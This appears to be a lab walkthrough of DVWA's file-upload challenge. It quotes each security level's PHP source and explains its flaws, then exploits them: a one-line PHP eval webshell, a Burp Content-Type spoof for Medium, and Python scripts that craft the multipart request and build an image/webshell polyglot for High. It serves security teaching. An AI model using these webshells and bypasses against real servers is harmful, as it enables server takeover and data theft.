Low
- Source code:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; // upload directory
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // append the file name submitted in the 'uploaded' form field

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { // move the uploaded file to the target path
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
?>
As can be seen, the Low-level code does almost nothing with the uploaded file: a file of any type and any size can be uploaded, and the server performs no check or filtering on the file's type or content, which is an obvious file upload vulnerability. After building the upload path, the server only checks whether the move succeeded and prints the corresponding message, and the success message includes the path, which tells the attacker exactly where the file landed.
Exploitation
Upload a one-line PHP webshell (<?php @eval($_POST['123']); ?>); the connection password is 123.
The upload succeeds and the page returns the corresponding path.
Remove the relative prefix of the returned path (the part highlighted in blue in the screenshot) and replace it with the site's base URL.
In China Chopper (中国菜刀), right-click, choose Add, and enter the shell address: http://127.0.0.1/DVWA-master/hackable/uploads/1.php
All files on the server can now be downloaded and modified.
A terminal can also be opened.
Medium
- Source code:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>
As can be seen, the Medium-level code restricts the type and size of the uploaded file: the type must be image/jpeg or image/png, and the size must be below 100000 bytes (about 97.6 KiB). The type check, however, reads $_FILES['uploaded']['type'], which is nothing more than the Content-Type header the client sent with the file part of the multipart request, so the client can set it to whatever it likes; the file name itself is never inspected.
We intercept the request with Burp Suite and modify it.
Rename the one-line webshell from above to test.png.
Upload test.png and intercept the request.
In the intercepted request, change the filename in the Content-Disposition line of the file part from test.png back to test.php, and leave the Content-Type: image/png line as it is, since that is the only thing the server checks. When done, click Forward, which sends the packet.
The upload succeeds!
Then connect with China Chopper exactly as in Low; this is not repeated here.
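The request Burp shows for this upload can be built by hand, which makes it clear which two fields the Low and Medium levels trust. The following Python is an added example and is not code from the original walkthrough or from DVWA; the host, upload path, boundary string and cookie values are assumptions for illustration, and the webshell bytes are the one-liner used on this page. build_upload_request() produces the raw multipart request, parse_file_part() shows what PHP would place into $_FILES['uploaded'] from it, and passes_medium_check() transcribes the Medium-level condition so the bypass can be checked offline.

```python
"""Craft the multipart/form-data upload request DVWA's upload form sends.

Added example, not part of the original page or of DVWA. Target host, path,
boundary and cookie values are placeholders.
"""
import re

# Constructed inputs: the page's one-line webshell and an assumed target.
WEBSHELL = b"<?php @eval($_POST['123']); ?>"
TARGET_HOST = "127.0.0.1"
UPLOAD_PATH = "/DVWA-master/vulnerabilities/upload/"
BOUNDARY = "----WebKitFormBoundaryExample123"


def build_upload_request(filename, content_type, data, boundary=BOUNDARY):
    """Return the raw HTTP request bytes, as Burp would display them.

    The two client-controlled values that matter are `filename` (which becomes
    basename($_FILES['uploaded']['name']) and hence the name on disk) and the
    part's Content-Type (which becomes $_FILES['uploaded']['type']).
    """
    crlf = b"\r\n"
    b = boundary.encode()
    body = b"".join([
        b"--" + b + crlf
        + b'Content-Disposition: form-data; name="MAX_FILE_SIZE"' + crlf + crlf
        + b"100000" + crlf,
        b"--" + b + crlf
        + b'Content-Disposition: form-data; name="uploaded"; filename="'
        + filename.encode() + b'"' + crlf
        + b"Content-Type: " + content_type.encode() + crlf + crlf
        + data + crlf,
        b"--" + b + crlf
        + b'Content-Disposition: form-data; name="Upload"' + crlf + crlf
        + b"Upload" + crlf,
        b"--" + b + b"--" + crlf,
    ])
    headers = (
        f"POST {UPLOAD_PATH} HTTP/1.1\r\n"
        f"Host: {TARGET_HOST}\r\n"
        f"Cookie: PHPSESSID=<session-id>; security=medium\r\n"  # placeholder session
        f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    ).encode()
    return headers + body


def parse_file_part(request):
    """Extract name, type and size of the 'uploaded' part: the server's view."""
    head, _, body = request.partition(b"\r\n\r\n")
    boundary = b"--" + re.search(rb"boundary=([^\r\n]+)", head).group(1)
    for part in body.split(boundary):
        if b'name="uploaded"' not in part:
            continue
        part_head, _, part_body = part.partition(b"\r\n\r\n")
        filename = re.search(rb'filename="([^"]*)"', part_head).group(1).decode()
        ctype = re.search(rb"Content-Type: ([^\r\n]+)", part_head).group(1).decode()
        data = part_body[:-2]  # drop the CRLF that precedes the next boundary
        return {"name": filename, "type": ctype, "size": len(data)}
    raise ValueError("no file part in request")


def passes_medium_check(file_info):
    """DVWA Medium, transcribed: only the client-sent MIME type and the size
    are examined; the file name is never looked at."""
    return (file_info["type"] in ("image/jpeg", "image/png")
            and file_info["size"] < 100000)


def low_request():
    # What a browser sends for 1.php; Low accepts it as-is.
    return build_upload_request("1.php", "application/octet-stream", WEBSHELL)


def medium_bypass_request():
    # Keep the .php name that will be written to disk, spoof only the part's Content-Type.
    return build_upload_request("1.php", "image/png", WEBSHELL)


if __name__ == "__main__":
    for label, req in (("low", low_request()), ("medium bypass", medium_bypass_request())):
        info = parse_file_part(req)
        print(label, info, "passes Medium:", passes_medium_check(info))
    print(medium_bypass_request().decode())
```

The printed request is the same text you would edit in Burp's Proxy tab; sending it with a raw socket, or pasting it into Repeater, reproduces the bypass. Note that the file part's Content-Type line and the Content-Type header of the request itself are different things: the server's $_FILES type comes from the former.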
High
- Source code:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>
Code analysis:
The strrpos() and getimagesize() functions have been added. The source now restricts the upload format more strictly: the extension taken from the file name must be one of ".jpg", ".jpeg" or ".png" (compared case-insensitively), the size limit remains, and getimagesize() must succeed on the uploaded file, so the file must begin with a valid image header. The Content-Type sent by the client is no longer consulted at all.
strrpos(): finds the position of the last occurrence of one string inside another. Here it locates the last "." in the file name so that substr() can take everything after it as the extension.
getimagesize(): returns the image dimensions and related information as an array on success; on failure it returns FALSE and raises an E_WARNING.
We therefore merge the one-line webshell with a real image so that the result is still an image file, as follows:
Change the image file's extension to .txt.
Open the .txt file and append the one-line webshell (<?php @eval($_POST['123']); ?>) at the end.
Rename the file back to .jpg.
Upload it: the upload succeeds. Note, however, that the file is stored with a .jpg extension, so the web server serves it as an image rather than executing it; the embedded PHP only runs if some other flaw, such as a file inclusion vulnerability, causes the server to include the uploaded file as PHP. Connecting with China Chopper directly to the .jpg URL will not work on its own.
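The image/webshell merge can be built and checked without an image file at all. The following Python is an added example and is not code from the original walkthrough or from DVWA: it generates a tiny but valid PNG in code (the page uses a JPEG, and appending after the JPEG end-of-image marker works the same way), appends the page's one-line webshell after the IEND chunk, and then runs a header-only check in the spirit of getimagesize() plus a transcription of the High-level condition to confirm the polyglot passes. The file name shell.png is an assumption.

```python
"""Image/PHP polyglot for DVWA High: a valid PNG with a webshell appended.

Added example, not part of the original page or of DVWA. The PNG is
constructed inline; no image file is needed.
"""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
WEBSHELL = b"<?php @eval($_POST['123']); ?>"  # the page's one-liner


def _chunk(ctype, data):
    """One PNG chunk: 4-byte length, type, data, CRC-32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def minimal_png(width=1, height=1, rgb=(255, 0, 0)):
    """A fully valid 8-bit RGB PNG, a few dozen bytes long."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    row = b"\x00" + bytes(rgb) * width  # filter type 0 followed by the pixels
    idat = zlib.compress(row * height)
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b""))


def make_polyglot(image, payload=WEBSHELL):
    """The page's trick, done in code: append the webshell to the image bytes.
    Equivalent to renaming to .txt, pasting the payload at the end, renaming back."""
    return image + payload


def image_size(data):
    """Header-only check like getimagesize(): PNG signature plus IHDR width and
    height. Bytes after IEND are never inspected, so the appended payload
    does not disturb the result. Returns None when the data is not a PNG."""
    if not data.startswith(PNG_SIGNATURE) or len(data) < 24:
        return None
    length, ctype = struct.unpack(">I4s", data[8:16])
    if ctype != b"IHDR" or length != 13:
        return None
    return struct.unpack(">II", data[16:24])


def passes_high_check(filename, data):
    """DVWA High, transcribed: extension whitelist, size limit, image header."""
    ext = filename[filename.rfind(".") + 1:].lower()
    return (ext in ("jpg", "jpeg", "png")
            and len(data) < 100000
            and image_size(data) is not None)


def payload_offset(data, payload=WEBSHELL):
    """Where the webshell sits in the file (after the IEND chunk), or -1."""
    return data.rfind(payload)


if __name__ == "__main__":
    poly = make_polyglot(minimal_png())
    print("size:", len(poly), "dimensions:", image_size(poly))
    print("payload at offset:", payload_offset(poly))
    print("passes High check as shell.png:", passes_high_check("shell.png", poly))
    print("passes High check as shell.php:", passes_high_check("shell.php", poly))
    with open("shell.png", "wb") as f:  # assumed file name
        f.write(poly)
```

Appending after IEND is the simplest placement and is what the page's text-editor method produces; image decoders stop at IEND, so the payload is invisible to them, while PHP, if it ever parses the file, scans the whole file for the <?php tag regardless of where it sits.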